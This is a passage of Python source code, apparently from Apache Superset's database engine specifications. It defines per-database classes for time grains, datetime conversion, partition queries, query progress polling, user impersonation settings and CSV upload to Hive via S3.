def handle_cursor(cls, cursor, query, session):
"""Handle a live cursor between the execute and fetchall calls
The flow works without this method doing anything, but it allows
for handling the cursor and updating progress information in the
query object"""
pass
@classmethod
def extract_error_message(cls, e):
"""Extract error message for queries"""
return utils.error_msg_from_exception(e)
@classmethod
def adjust_database_uri(cls, uri, selected_schema):
"""Based on a URI and selected schema, return a new URI
The URI here represents the URI as entered when saving the database,
``selected_schema`` is the schema currently active presumably in
the SQL Lab dropdown. Based on that, for some database engine,
we can return a new altered URI that connects straight to the
active schema, meaning the users won't have to prefix the object
names by the schema name.
Some databases engines have 2 level of namespacing: database and
schema (postgres, oracle, mssql, ...)
For those it's probably better to not alter the database
component of the URI with the schema name, it won't work.
Some database drivers like presto accept '{catalog}/{schema}' in
the database component of the URL, that can be handled here.
"""
return uri
@classmethod
def patch(cls):
pass
@classmethod
def get_schema_names(cls, inspector):
return inspector.get_schema_names()
@classmethod
def get_table_names(cls, schema, inspector):
return sorted(inspector.get_table_names(schema))
@classmethod
def where_latest_partition(
cls, table_name, schema, database, qry, columns=None):
return False
@classmethod
def select_star(cls, my_db, table_name, engine, schema=None, limit=100,
show_cols=False, indent=True, latest_partition=True,
cols=None):
fields = '*'
cols = cols or []
if (show_cols or latest_partition) and not cols:
cols = my_db.get_columns(table_name, schema)
if show_cols:
fields = [sqla.column(c.get('name')) for c in cols]
full_table_name = table_name
quote = engine.dialect.identifier_preparer.quote
if schema:
full_table_name = quote(schema) + '.' + quote(table_name)
else:
full_table_name = quote(table_name)
qry = select(fields).select_from(text(full_table_name))
if limit:
qry = qry.limit(limit)
if latest_partition:
partition_query = cls.where_latest_partition(
table_name, schema, my_db, qry, columns=cols)
if partition_query != False: # noqa
qry = partition_query
sql = my_db.compile_sqla_query(qry)
if indent:
sql = sqlparse.format(sql, reindent=True)
return sql
@classmethod
def modify_url_for_impersonation(cls, url, impersonate_user, username):
"""
Modify the SQL Alchemy URL object with the user to impersonate if applicable.
:param url: SQLAlchemy URL object
:param impersonate_user: Bool indicating if impersonation is enabled
:param username: Effective username
"""
if impersonate_user is not None and username is not None:
url.username = username
@classmethod
def get_configuration_for_impersonation(cls, uri, impersonate_user, username):
"""
Return a configuration dictionary that can be merged with other configs
that can set the correct properties for impersonating users
:param uri: URI string
:param impersonate_user: Bool indicating if impersonation is enabled
:param username: Effective username
:return: Dictionary with configs required for impersonation
"""
return {}
@classmethod
def get_normalized_column_names(cls, cursor_description):
columns = cursor_description if cursor_description else []
return [cls.normalize_column_name(col[0]) for col in columns]
@staticmethod
def normalize_column_name(column_name):
return column_name
class PostgresBaseEngineSpec(BaseEngineSpec):
""" Abstract class for Postgres 'like' databases """
engine = ''
time_grains = (
Grain('Time Column', _('Time Column'), '{col}', None),
Grain('second', _('second'),
"DATE_TRUNC('second', {col}) AT TIME ZONE 'UTC'", 'PT1S'),
Grain('minute', _('minute'),
"DATE_TRUNC('minute', {col}) AT TIME ZONE 'UTC'", 'PT1M'),
Grain('hour', _('hour'),
"DATE_TRUNC('hour', {col}) AT TIME ZONE 'UTC'", 'PT1H'),
Grain('day', _('day'),
"DATE_TRUNC('day', {col}) AT TIME ZONE 'UTC'", 'P1D'),
Grain('week', _('week'),
"DATE_TRUNC('week', {col}) AT TIME ZONE 'UTC'", 'P1W'),
Grain('month', _('month'),
"DATE_TRUNC('month', {col}) AT TIME ZONE 'UTC'", 'P1M'),
Grain('quarter', _('quarter'),
"DATE_TRUNC('quarter', {col}) AT TIME ZONE 'UTC'", 'P0.25Y'),
Grain('year', _('year'),
"DATE_TRUNC('year', {col}) AT TIME ZONE 'UTC'", 'P1Y'),
)
@classmethod
def fetch_data(cls, cursor, limit):
if not cursor.description:
return []
if cls.limit_method == LimitMethod.FETCH_MANY:
return cursor.fetchmany(limit)
return cursor.fetchall()
@classmethod
def epoch_to_dttm(cls):
return "(timestamp 'epoch' + {col} * interval '1 second')"
@classmethod
def convert_dttm(cls, target_type, dttm):
return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))
class PostgresEngineSpec(PostgresBaseEngineSpec):
engine = 'postgresql'
@classmethod
def get_table_names(cls, schema, inspector):
"""Need to consider foreign tables for PostgreSQL"""
tables = inspector.get_table_names(schema)
tables.extend(inspector.get_foreign_table_names(schema))
return sorted(tables)
class SnowflakeEngineSpec(PostgresBaseEngineSpec):
engine = 'snowflake'
time_grains = (
Grain('Time Column', _('Time Column'), '{col}', None),
Grain('second', _('second'), "DATE_TRUNC('SECOND', {col})", 'PT1S'),
Grain('minute', _('minute'), "DATE_TRUNC('MINUTE', {col})", 'PT1M'),
Grain('hour', _('hour'), "DATE_TRUNC('HOUR', {col})", 'PT1H'),
Grain('day', _('day'), "DATE_TRUNC('DAY', {col})", 'P1D'),
Grain('week', _('week'), "DATE_TRUNC('WEEK', {col})", 'P1W'),
Grain('month', _('month'), "DATE_TRUNC('MONTH', {col})", 'P1M'),
Grain('quarter', _('quarter'), "DATE_TRUNC('QUARTER', {col})", 'P0.25Y'),
Grain('year', _('year'), "DATE_TRUNC('YEAR', {col})", 'P1Y'),
)
@staticmethod
def normalize_column_name(column_name):
return column_name.lower()
class VerticaEngineSpec(PostgresBaseEngineSpec):
engine = 'vertica'
class RedshiftEngineSpec(PostgresBaseEngineSpec):
engine = 'redshift'
class OracleEngineSpec(PostgresBaseEngineSpec):
engine = 'oracle'
limit_method = LimitMethod.WRAP_SQL
time_grains = (
Grain('Time Column', _('Time Column'), '{col}', None),
Grain('minute', _('minute'), "TRUNC(TO_DATE({col}), 'MI')", 'PT1M'),
Grain('hour', _('hour'), "TRUNC(TO_DATE({col}), 'HH')", 'PT1H'),
Grain('day', _('day'), "TRUNC(TO_DATE({col}), 'DDD')", 'P1D'),
Grain('week', _('week'), "TRUNC(TO_DATE({col}), 'WW')", 'P1W'),
Grain('month', _('month'), "TRUNC(TO_DATE({col}), 'MONTH')", 'P1M'),
Grain('quarter', _('quarter'), "TRUNC(TO_DATE({col}), 'Q')", 'P0.25Y'),
Grain('year', _('year'), "TRUNC(TO_DATE({col}), 'YEAR')", 'P1Y'),
)
@classmethod
def convert_dttm(cls, target_type, dttm):
return (
"""TO_TIMESTAMP('{}', 'YYYY-MM-DD"T"HH24:MI:SS.ff6')"""
).format(dttm.isoformat())
@staticmethod
def normalize_column_name(column_name):
return column_name.lower()
class Db2EngineSpec(BaseEngineSpec):
engine = 'ibm_db_sa'
limit_method = LimitMethod.WRAP_SQL
time_grains = (
Grain('Time Column', _('Time Column'), '{col}', None),
Grain('second', _('second'),
'CAST({col} as TIMESTAMP)'
' - MICROSECOND({col}) MICROSECONDS',
'PT1S'),
Grain('minute', _('minute'),
'CAST({col} as TIMESTAMP)'
' - SECOND({col}) SECONDS'
' - MICROSECOND({col}) MICROSECONDS',
'PT1M'),
Grain('hour', _('hour'),
'CAST({col} as TIMESTAMP)'
' - MINUTE({col}) MINUTES'
' - SECOND({col}) SECONDS'
' - MICROSECOND({col}) MICROSECONDS ',
'PT1H'),
Grain('day', _('day'),
'CAST({col} as TIMESTAMP)'
' - HOUR({col}) HOURS'
' - MINUTE({col}) MINUTES'
' - SECOND({col}) SECONDS'
' - MICROSECOND({col}) MICROSECONDS ',
'P1D'),
Grain('week', _('week'),
'{col} - (DAYOFWEEK({col})) DAYS',
'P1W'),
Grain('month', _('month'),
'{col} - (DAY({col})-1) DAYS',
'P1M'),
Grain('quarter', _('quarter'),
'{col} - (DAY({col})-1) DAYS'
' - (MONTH({col})-1) MONTHS'
' + ((QUARTER({col})-1) * 3) MONTHS',
'P0.25Y'),
Grain('year', _('year'),
'{col} - (DAY({col})-1) DAYS'
' - (MONTH({col})-1) MONTHS',
'P1Y'),
)
@classmethod
def epoch_to_dttm(cls):
return "(TIMESTAMP('1970-01-01', '00:00:00') + {col} SECONDS)"
@classmethod
def convert_dttm(cls, target_type, dttm):
return "'{}'".format(dttm.strftime('%Y-%m-%d-%H.%M.%S'))
class SqliteEngineSpec(BaseEngineSpec):
engine = 'sqlite'
time_grains = (
Grain('Time Column', _('Time Column'), '{col}', None),
Grain('hour', _('hour'),
"DATETIME(STRFTIME('%Y-%m-%dT%H:00:00', {col}))",
'PT1H'),
Grain('day', _('day'), 'DATE({col})', 'P1D'),
Grain('week', _('week'),
"DATE({col}, -strftime('%W', {col}) || ' days')",
'P1W'),
Grain('month', _('month'),
"DATE({col}, -strftime('%d', {col}) || ' days', '+1 day')",
'P1M'),
Grain('year', _('year'),
"DATETIME(STRFTIME('%Y-01-01T00:00:00', {col}))",
'P1Y'),
Grain('week_ending_saturday', _('week_ending_saturday'),
"DATE({col}, 'weekday 6')",
'P1W/1970-01-03T00:00:00Z'),
Grain('week_start_sunday', _('week_start_sunday'),
"DATE({col}, 'weekday 0', '-7 days')",
'1969-12-28T00:00:00Z/P1W'),
)
@classmethod
def epoch_to_dttm(cls):
return "datetime({col}, 'unixepoch')"
@classmethod
@cache_util.memoized_func(
timeout=600,
key=lambda *args, **kwargs: 'db:{}:{}'.format(args[0].id, args[1]))
def fetch_result_sets(cls, db, datasource_type, force=False):
schemas = db.inspector.get_schema_names()
result_sets = {}
all_result_sets = []
schema = schemas[0]
if datasource_type == 'table':
result_sets[schema] = sorted(db.inspector.get_table_names())
elif datasource_type == 'view':
result_sets[schema] = sorted(db.inspector.get_view_names())
all_result_sets += [
'{}.{}'.format(schema, t) for t in result_sets[schema]]
if all_result_sets:
result_sets[''] = all_result_sets
return result_sets
@classmethod
def convert_dttm(cls, target_type, dttm):
iso = dttm.isoformat().replace('T', ' ')
if '.' not in iso:
iso += '.000000'
return "'{}'".format(iso)
@classmethod
def get_table_names(cls, schema, inspector):
"""Need to disregard the schema for Sqlite"""
return sorted(inspector.get_table_names())
class MySQLEngineSpec(BaseEngineSpec):
engine = 'mysql'
cursor_execute_kwargs = {'args': {}}
time_grains = (
Grain('Time Column', _('Time Column'), '{col}', None),
Grain('second', _('second'), 'DATE_ADD(DATE({col}), '
'INTERVAL (HOUR({col})*60*60 + MINUTE({col})*60'
' + SECOND({col})) SECOND)',
'PT1S'),
Grain('minute', _('minute'), 'DATE_ADD(DATE({col}), '
'INTERVAL (HOUR({col})*60 + MINUTE({col})) MINUTE)',
'PT1M'),
Grain('hour', _('hour'), 'DATE_ADD(DATE({col}), '
'INTERVAL HOUR({col}) HOUR)',
'PT1H'),
Grain('day', _('day'), 'DATE({col})', 'P1D'),
Grain('week', _('week'), 'DATE(DATE_SUB({col}, '
'INTERVAL DAYOFWEEK({col}) - 1 DAY))',
'P1W'),
Grain('month', _('month'), 'DATE(DATE_SUB({col}, '
'INTERVAL DAYOFMONTH({col}) - 1 DAY))',
'P1M'),
Grain('quarter', _('quarter'), 'MAKEDATE(YEAR({col}), 1) '
'+ INTERVAL QUARTER({col}) QUARTER - INTERVAL 1 QUARTER',
'P0.25Y'),
Grain('year', _('year'), 'DATE(DATE_SUB({col}, '
'INTERVAL DAYOFYEAR({col}) - 1 DAY))',
'P1Y'),
Grain('week_start_monday', _('week_start_monday'),
'DATE(DATE_SUB({col}, '
'INTERVAL DAYOFWEEK(DATE_SUB({col}, INTERVAL 1 DAY)) - 1 DAY))',
'P1W'),
)
@classmethod
def convert_dttm(cls, target_type, dttm):
if target_type.upper() in ('DATETIME', 'DATE'):
return "STR_TO_DATE('{}', '%Y-%m-%d %H:%i:%s')".format(
dttm.strftime('%Y-%m-%d %H:%M:%S'))
return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))
@classmethod
def adjust_database_uri(cls, uri, selected_schema=None):
if selected_schema:
uri.database = selected_schema
return uri
@classmethod
def epoch_to_dttm(cls):
return 'from_unixtime({col})'
@classmethod
def extract_error_message(cls, e):
"""Extract error message for queries"""
message = str(e)
try:
if isinstance(e.args, tuple) and len(e.args) > 1:
message = e.args[1]
except Exception:
pass
return message
class PrestoEngineSpec(BaseEngineSpec):
engine = 'presto'
cursor_execute_kwargs = {'parameters': None}
time_grains = (
Grain('Time Column', _('Time Column'), '{col}', None),
Grain('second', _('second'),
"date_trunc('second', CAST({col} AS TIMESTAMP))",
'PT1S'),
Grain('minute', _('minute'),
"date_trunc('minute', CAST({col} AS TIMESTAMP))",
'PT1M'),
Grain('hour', _('hour'),
"date_trunc('hour', CAST({col} AS TIMESTAMP))",
'PT1H'),
Grain('day', _('day'),
"date_trunc('day', CAST({col} AS TIMESTAMP))",
'P1D'),
Grain('week', _('week'),
"date_trunc('week', CAST({col} AS TIMESTAMP))",
'P1W'),
Grain('month', _('month'),
"date_trunc('month', CAST({col} AS TIMESTAMP))",
'P1M'),
Grain('quarter', _('quarter'),
"date_trunc('quarter', CAST({col} AS TIMESTAMP))",
'P0.25Y'),
Grain('week_ending_saturday', _('week_ending_saturday'),
"date_add('day', 5, date_trunc('week', date_add('day', 1, "
'CAST({col} AS TIMESTAMP))))',
'P1W/1970-01-03T00:00:00Z'),
Grain('week_start_sunday', _('week_start_sunday'),
"date_add('day', -1, date_trunc('week', "
"date_add('day', 1, CAST({col} AS TIMESTAMP))))",
'1969-12-28T00:00:00Z/P1W'),
Grain('year', _('year'),
"date_trunc('year', CAST({col} AS TIMESTAMP))",
'P1Y'),
)
@classmethod
def adjust_database_uri(cls, uri, selected_schema=None):
database = uri.database
if selected_schema and database:
if '/' in database:
database = database.split('/')[0] + '/' + selected_schema
else:
database += '/' + selected_schema
uri.database = database
return uri
@classmethod
def convert_dttm(cls, target_type, dttm):
tt = target_type.upper()
if tt == 'DATE':
return "from_iso8601_date('{}')".format(dttm.isoformat()[:10])
if tt == 'TIMESTAMP':
return "from_iso8601_timestamp('{}')".format(dttm.isoformat())
return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))
@classmethod
def epoch_to_dttm(cls):
return 'from_unixtime({col})'
@classmethod
@cache_util.memoized_func(
timeout=600,
key=lambda *args, **kwargs: 'db:{}:{}'.format(args[0].id, args[1]))
def fetch_result_sets(cls, db, datasource_type, force=False):
"""Returns the dictionary {schema : [result_set_name]}.
Datasource_type can be 'table' or 'view'.
Empty schema corresponds to the list of full names of the all
tables or views: <schema>.<result_set_name>.
"""
result_set_df = db.get_df(
"""SELECT table_schema, table_name FROM INFORMATION_SCHEMA.{}S
ORDER BY concat(table_schema, '.', table_name)""".format(
datasource_type.upper(),
),
None)
result_sets = defaultdict(list)
for unused, row in result_set_df.iterrows():
result_sets[row['table_schema']].append(row['table_name'])
result_sets[''].append('{}.{}'.format(
row['table_schema'], row['table_name']))
return result_sets
@classmethod
def extra_table_metadata(cls, database, table_name, schema_name):
indexes = database.get_indexes(table_name, schema_name)
if not indexes:
return {}
cols = indexes[0].get('column_names', [])
full_table_name = table_name
if schema_name and '.' not in table_name:
full_table_name = '{}.{}'.format(schema_name, table_name)
pql = cls._partition_query(full_table_name)
col_name, latest_part = cls.latest_partition(
table_name, schema_name, database, show_first=True)
return {
'partitions': {
'cols': cols,
'latest': {col_name: latest_part},
'partitionQuery': pql,
},
}
@classmethod
def handle_cursor(cls, cursor, query, session):
"""Updates progress information"""
logging.info('Polling the cursor for progress')
polled = cursor.poll()
# poll returns dict -- JSON status information or ``None``
# if the query is done
# https://github.com/dropbox/PyHive/blob/
# b34bdbf51378b3979eaf5eca9e956f06ddc36ca0/pyhive/presto.py#L178
while polled:
# Update the object and wait for the kill signal.
stats = polled.get('stats', {})
query = session.query(type(query)).filter_by(id=query.id).one()
if query.status in [QueryStatus.STOPPED, QueryStatus.TIMED_OUT]:
cursor.cancel()
break
if stats:
state = stats.get('state')
# if already finished, then stop polling
if state == 'FINISHED':
break
completed_splits = float(stats.get('completedSplits'))
total_splits = float(stats.get('totalSplits'))
if total_splits and completed_splits:
progress = 100 * (completed_splits / total_splits)
logging.info(
'Query progress: {} / {} '
'splits'.format(completed_splits, total_splits))
if progress > query.progress:
query.progress = progress
session.commit()
time.sleep(1)
logging.info('Polling the cursor for progress')
polled = cursor.poll()
@classmethod
def extract_error_message(cls, e):
if (
hasattr(e, 'orig') and
type(e.orig).__name__ == 'DatabaseError' and
isinstance(e.orig[0], dict)):
error_dict = e.orig[0]
return '{} at {}: {}'.format(
error_dict.get('errorName'),
error_dict.get('errorLocation'),
error_dict.get('message'),
)
if (
type(e).__name__ == 'DatabaseError' and
hasattr(e, 'args') and
len(e.args) > 0
):
error_dict = e.args[0]
return error_dict.get('message')
return utils.error_msg_from_exception(e)
@classmethod
def _partition_query(
cls, table_name, limit=0, order_by=None, filters=None):
"""Returns a partition query
:param table_name: the name of the table to get partitions from
:type table_name: str
:param limit: the number of partitions to be returned
:type limit: int
:param order_by: a list of tuples of field name and a boolean
that determines if that field should be sorted in descending
order
:type order_by: list of (str, bool) tuples
:param filters: a list of filters to apply
:param filters: dict of field name and filter value combinations
"""
limit_clause = 'LIMIT {}'.format(limit) if limit else ''
order_by_clause = ''
if order_by:
l = [] # noqa: E741
for field, desc in order_by:
l.append(field + ' DESC' if desc else '')
order_by_clause = 'ORDER BY ' + ', '.join(l)
where_clause = ''
if filters:
l = [] # noqa: E741
for field, value in filters.items():
l.append("{field} = '{value}'".format(**locals()))
where_clause = 'WHERE ' + ' AND '.join(l)
sql = textwrap.dedent("""\
SHOW PARTITIONS FROM {table_name}
{where_clause}
{order_by_clause}
{limit_clause}
""").format(**locals())
return sql
@classmethod
def _latest_partition_from_df(cls, df):
recs = df.to_records(index=False)
if recs:
return recs[0][0]
@classmethod
def latest_partition(cls, table_name, schema, database, show_first=False):
"""Returns col name and the latest (max) partition value for a table
:param table_name: the name of the table
:type table_name: str
:param schema: schema / database / namespace
:type schema: str
:param database: database query will be run against
:type database: models.Database
:param show_first: displays the value for the first partitioning key
if there are many partitioning keys
:type show_first: bool
>>> latest_partition('foo_table')
'2018-01-01'
"""
indexes = database.get_indexes(table_name, schema)
if len(indexes[0]['column_names']) < 1:
raise SupersetTemplateException(
'The table should have one partitioned field')
elif not show_first and len(indexes[0]['column_names']) > 1:
raise SupersetTemplateException(
'The table should have a single partitioned field '
'to use this function. You may want to use '
'`presto.latest_sub_partition`')
part_field = indexes[0]['column_names'][0]
sql = cls._partition_query(table_name, 1, [(part_field, True)])
df = database.get_df(sql, schema)
return part_field, cls._latest_partition_from_df(df)
@classmethod
def latest_sub_partition(cls, table_name, schema, database, **kwargs):
"""Returns the latest (max) partition value for a table
A filtering criteria should be passed for all fields that are
partitioned except for the field to be returned. For example,
if a table is partitioned by (``ds``, ``event_type`` and
``event_category``) and you want the latest ``ds``, you'll want
to provide a filter as keyword arguments for both
``event_type`` and ``event_category`` as in
``latest_sub_partition('my_table',
event_category='page', event_type='click')``
:param table_name: the name of the table, can be just the table
name or a fully qualified table name as ``schema_name.table_name``
:type table_name: str
:param schema: schema / database / namespace
:type schema: str
:param database: database query will be run against
:type database: models.Database
:param kwargs: keyword arguments define the filtering criteria
on the partition list. There can be many of these.
:type kwargs: str
>>> latest_sub_partition('sub_partition_table', event_type='click')
'2018-01-01'
"""
indexes = database.get_indexes(table_name, schema)
part_fields = indexes[0]['column_names']
for k in kwargs.keys():
if k not in k in part_fields:
msg = 'Field [{k}] is not part of the portioning key'
raise SupersetTemplateException(msg)
if len(kwargs.keys()) != len(part_fields) - 1:
msg = (
'A filter needs to be specified for {} out of the '
'{} fields.'
).format(len(part_fields) - 1, len(part_fields))
raise SupersetTemplateException(msg)
for field in part_fields:
if field not in kwargs.keys():
field_to_return = field
sql = cls._partition_query(
table_name, 1, [(field_to_return, True)], kwargs)
df = database.get_df(sql, schema)
if df.empty:
return ''
return df.to_dict()[field_to_return][0]
class HiveEngineSpec(PrestoEngineSpec):
"""Reuses PrestoEngineSpec functionality."""
engine = 'hive'
cursor_execute_kwargs = {'async': True}
# Scoping regex at class level to avoid recompiling
# 17/02/07 19:36:38 INFO ql.Driver: Total jobs = 5
jobs_stats_r = re.compile(
r'.*INFO.*Total jobs = (?P<max_jobs>[0-9]+)')
# 17/02/07 19:37:08 INFO ql.Driver: Launching Job 2 out of 5
launching_job_r = re.compile(
'.*INFO.*Launching Job (?P<job_number>[0-9]+) out of '
'(?P<max_jobs>[0-9]+)')
# 17/02/07 19:36:58 INFO exec.Task: 2017-02-07 19:36:58,152 Stage-18
# map = 0%, reduce = 0%
stage_progress_r = re.compile(
r'.*INFO.*Stage-(?P<stage_number>[0-9]+).*'
r'map = (?P<map_progress>[0-9]+)%.*'
r'reduce = (?P<reduce_progress>[0-9]+)%.*')
@classmethod
def patch(cls):
from pyhive import hive
from superset.db_engines import hive as patched_hive
from TCLIService import (
constants as patched_constants,
ttypes as patched_ttypes,
TCLIService as patched_TCLIService)
hive.TCLIService = patched_TCLIService
hive.constants = patched_constants
hive.ttypes = patched_ttypes
hive.Cursor.fetch_logs = patched_hive.fetch_logs
@classmethod
@cache_util.memoized_func(
timeout=600,
key=lambda *args, **kwargs: 'db:{}:{}'.format(args[0].id, args[1]))
def fetch_result_sets(cls, db, datasource_type, force=False):
return BaseEngineSpec.fetch_result_sets(
db, datasource_type, force=force)
@classmethod
def fetch_data(cls, cursor, limit):
from TCLIService import ttypes
state = cursor.poll()
if state.operationState == ttypes.TOperationState.ERROR_STATE:
raise Exception('Query error', state.errorMessage)
return super(HiveEngineSpec, cls).fetch_data(cursor, limit)
@staticmethod
def create_table_from_csv(form, table):
"""Uploads a csv file and creates a superset datasource in Hive."""
def convert_to_hive_type(col_type):
"""maps tableschema's types to hive types"""
tableschema_to_hive_types = {
'boolean': 'BOOLEAN',
'integer': 'INT',
'number': 'DOUBLE',
'string': 'STRING',
}
return tableschema_to_hive_types.get(col_type, 'STRING')
table_name = form.name.data
if config.get('UPLOADED_CSV_HIVE_NAMESPACE'):
if '.' in table_name:
raise Exception(
"You can't specify a namespace. "
'All tables will be uploaded to the `{}` namespace'.format(
config.get('HIVE_NAMESPACE')))
table_name = '{}.{}'.format(
config.get('UPLOADED_CSV_HIVE_NAMESPACE'), table_name)
filename = form.csv_file.data.filename
bucket_path = config['CSV_TO_HIVE_UPLOAD_S3_BUCKET']
if not bucket_path:
logging.info('No upload bucket specified')
raise Exception(
'No upload bucket specified. You can specify one in the config file.')
table_name = form.name.data
filename = form.csv_file.data.filename
upload_prefix = config['CSV_TO_HIVE_UPLOAD_DIRECTORY']
upload_path = config['UPLOAD_FOLDER'] + \
secure_filename(form.csv_file.data.filename)
hive_table_schema = Table(upload_path).infer()
column_name_and_type = []
for column_info in hive_table_schema['fields']:
column_name_and_type.append(
'{} {}'.format(
column_info['name'], convert_to_hive_type(column_info['type'])))
schema_definition = ', '.join(column_name_and_type)
s3 = boto3.client('s3')
location = os.path.join('s3a://', bucket_path, upload_prefix, table_name)
s3.upload_file(
upload_path, bucket_path,
os.path.join(upload_prefix, table_name, filename))
sql = """CREATE TABLE {table_name} ( {schema_definition} )
ROW FORMAT DELIMITED FIELDS TERMINATED BY ',' STORED AS
TEXTFILE LOCATION '{location}'
tblproperties ('skip.header.line.count'='1')""".format(**locals())
logging.info(form.con.data)
engine = create_engine(form.con.data.sqlalchemy_uri_decrypted)
engine.execute(sql)
@classmethod
def convert_dttm(cls, target_type, dttm):
tt = target_type.upper()
if tt == 'DATE':
return "CAST('{}' AS DATE)".format(dttm.isoformat()[:10])
elif tt == 'TIMESTAMP':
return "CAST('{}' AS TIMESTAMP)".format(
dttm.strftime('%Y-%m-%d %H:%M:%S'))
return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))
@classmethod
def adjust_database_uri(cls, uri, selected_schema=None):
if selected_schema:
uri.database = selected_schema
return uri
@classmethod
def extract_error_message(cls, e):
try:
msg = e.message.status.errorMessage
except Exception:
msg = str(e)
return msg
@classmethod
def progress(cls, log_lines):
total_jobs = 1 # assuming there's at least 1 job
current_job = 1
stages = {}
for line in log_lines:
match = cls.jobs_stats_r.match(line)
if match:
total_jobs = int(match.groupdict()['max_jobs']) or 1
match = cls.launching_job_r.match(line)
if match:
current_job = int(match.groupdict()['job_number'])
total_jobs = int(match.groupdict()['max_jobs']) or 1
stages = {}
match = cls.stage_progress_r.match(line)
if match:
stage_number = int(match.groupdict()['stage_number'])
map_progress = int(match.groupdict()['map_progress'])
reduce_progress = int(match.groupdict()['reduce_progress'])
stages[stage_number] = (map_progress + reduce_progress) / 2
logging.info(
'Progress detail: {}, '
'current job {}, '
'total jobs: {}'.format(stages, current_job, total_jobs))
stage_progress = sum(
stages.values()) / len(stages.values()) if stages else 0
progress = (
100 * (current_job - 1) / total_jobs + stage_progress / total_jobs
)
return int(progress)
@classmethod
def get_tracking_url(cls, log_lines):
lkp = 'Tracking URL = '
for line in log_lines:
if lkp in line:
return line.split(lkp)[1]
@classmethod
def handle_cursor(cls, cursor, query, session):
"""Updates progress information"""
from pyhive import hive
unfinished_states = (
hive.ttypes.TOperationState.INITIALIZED_STATE,
hive.ttypes.TOperationState.RUNNING_STATE,
)
polled = cursor.poll()
last_log_line = 0
tracking_url = None
job_id = None
while polled.operationState in unfinished_states:
query = session.query(type(query)).filter_by(id=query.id).one()
if query.status == QueryStatus.STOPPED:
cursor.cancel()
break
log = cursor.fetch_logs() or ''
if log:
log_lines = log.splitlines()
progress = cls.progress(log_lines)
logging.info('Progress total: {}'.format(progress))
needs_commit = False
if progress > query.progress:
query.progress = progress
needs_commit = True
if not tracking_url:
tracking_url = cls.get_tracking_url(log_lines)
if tracking_url:
job_id = tracking_url.split('/')[-2]
logging.info(
'Found the tracking url: {}'.format(tracking_url))
tracking_url = tracking_url_trans(tracking_url)
logging.info(
'Transformation applied: {}'.format(tracking_url))
query.tracking_url = tracking_url
logging.info('Job id: {}'.format(job_id))
needs_commit = True
if job_id and len(log_lines) > last_log_line:
# Wait for job id before logging things out
# this allows for prefixing all log lines and becoming
# searchable in something like Kibana
for l in log_lines[last_log_line:]:
logging.info('[{}] {}'.format(job_id, l))
last_log_line = len(log_lines)
if needs_commit:
session.commit()
time.sleep(hive_poll_interval)
polled = cursor.poll()
@classmethod
def where_latest_partition(
cls, table_name, schema, database, qry, columns=None):
try:
col_name, value = cls.latest_partition(
table_name, schema, database)
except Exception:
# table is not partitioned
return False
for c in columns:
if str(c.name) == str(col_name):
return qry.where(c == str(value))
return False
@classmethod
def latest_sub_partition(cls, table_name, schema, database, **kwargs):
# TODO(bogdan): implement`
pass
@classmethod
def _latest_partition_from_df(cls, df):
"""Hive partitions look like ds={partition name}"""
return df.ix[:, 0].max().split('=')[1]
@classmethod
def _partition_query(
cls, table_name, limit=0, order_by=None, filters=None):
return 'SHOW PARTITIONS {table_name}'.format(**locals())
@classmethod
def modify_url_for_impersonation(cls, url, impersonate_user, username):
"""
Modify the SQL Alchemy URL object with the user to impersonate if applicable.
:param url: SQLAlchemy URL object
:param impersonate_user: Bool indicating if impersonation is enabled
:param username: Effective username
"""
# Do nothing in the URL object since instead this should modify
# the configuraiton dictionary. See get_configuration_for_impersonation
pass
@classmethod
def get_configuration_for_impersonation(cls, uri, impersonate_user, username):
"""
Return a configuration dictionary that can be merged with other configs
that can set the correct properties for impersonating users
:param uri: URI string
:param impersonate_user: Bool indicating if impersonation is enabled
:param username: Effective username
:return: Dictionary with configs required for impersonation
"""
configuration = {}
url = make_url(uri)
backend_name = url.get_backend_name()
# Must be Hive connection, enable impersonation, and set param auth=LDAP|KERBEROS
if (backend_name == 'hive' and 'auth' in url.query.keys() and
impersonate_user is True and username is not None):
configuration['hive.server2.proxy.user'] = username
return configuration
class MssqlEngineSpec(BaseEngineSpec):
engine = 'mssql'
epoch_to_dttm = "dateadd(S, {col}, '1970-01-01')"
limit_method = LimitMethod.WRAP_SQL
time_grains = (
Grain('Time Column', _('Time Column'), '{col}', None),
Grain('second', _('second'), 'DATEADD(second, '
"DATEDIFF(second, '2000-01-01', {col}), '2000-01-01')",
'PT1S'),
Grain('minute', _('minute'), 'DATEADD(minute, '
'DATEDIFF(minute, 0, {col}), 0)',
'PT1M'),
Grain('5 minute', _('5 minute'), 'DATEADD(minute, '
'DATEDIFF(minute, 0, {col}) / 5 * 5, 0)',
'PT5M'),
Grain('half hour', _('half hour'), 'DATEADD(minute, '
'DATEDIFF(minute, 0, {col}) / 30 * 30, 0)',
'PT0.5H'),
Grain('hour', _('hour'), 'DATEADD(hour, '
'DATEDIFF(hour, 0, {col}), 0)',
'PT1H'),
Grain('day', _('day'), 'DATEADD(day, '
'DATEDIFF(day, 0, {col}), 0)',
'P1D'),
Grain('week', _('week'), 'DATEADD(week, '
'DATEDIFF(week, 0, {col}), 0)',
'P1W'),
Grain('month', _('month'), 'DATEADD(month, '
'DATEDIFF(month, 0, {col}), 0)',
'P1M'),
Grain('quarter', _('quarter'), 'DATEADD(quarter, '
'DATEDIFF(quarter, 0, {col}), 0)',
'P0.25Y'),
Grain('year', _('year'), 'DATEADD(year, '
'DATEDIFF(year, 0, {col}), 0)',
'P1Y'),
)
@classmethod
def convert_dttm(cls, target_type, dttm):
return "CONVERT(DATETIME, '{}', 126)".format(dttm.isoformat())
class AthenaEngineSpec(BaseEngineSpec):
engine = 'awsathena'
time_grains = (
Grain('Time Column', _('Time Column'), '{col}', None),
Grain('second', _('second'),
"date_trunc('second', CAST({col} AS TIMESTAMP))",
'PT1S'),
Grain('minute', _('minute'),
"date_trunc('minute', CAST({col} AS TIMESTAMP))",
'PT1M'),
Grain('hour', _('hour'),
"date_trunc('hour', CAST({col} AS TIMESTAMP))",
'PT1H'),
Grain('day', _('day'),
"date_trunc('day', CAST({col} AS TIMESTAMP))",
'P1D'),
Grain('week', _('week'),
"date_trunc('week', CAST({col} AS TIMESTAMP))",
'P1W'),
Grain('month', _('month'),
"date_trunc('month', CAST({col} AS TIMESTAMP))",
'P1M'),
Grain('quarter', _('quarter'),
"date_trunc('quarter', CAST({col} AS TIMESTAMP))",
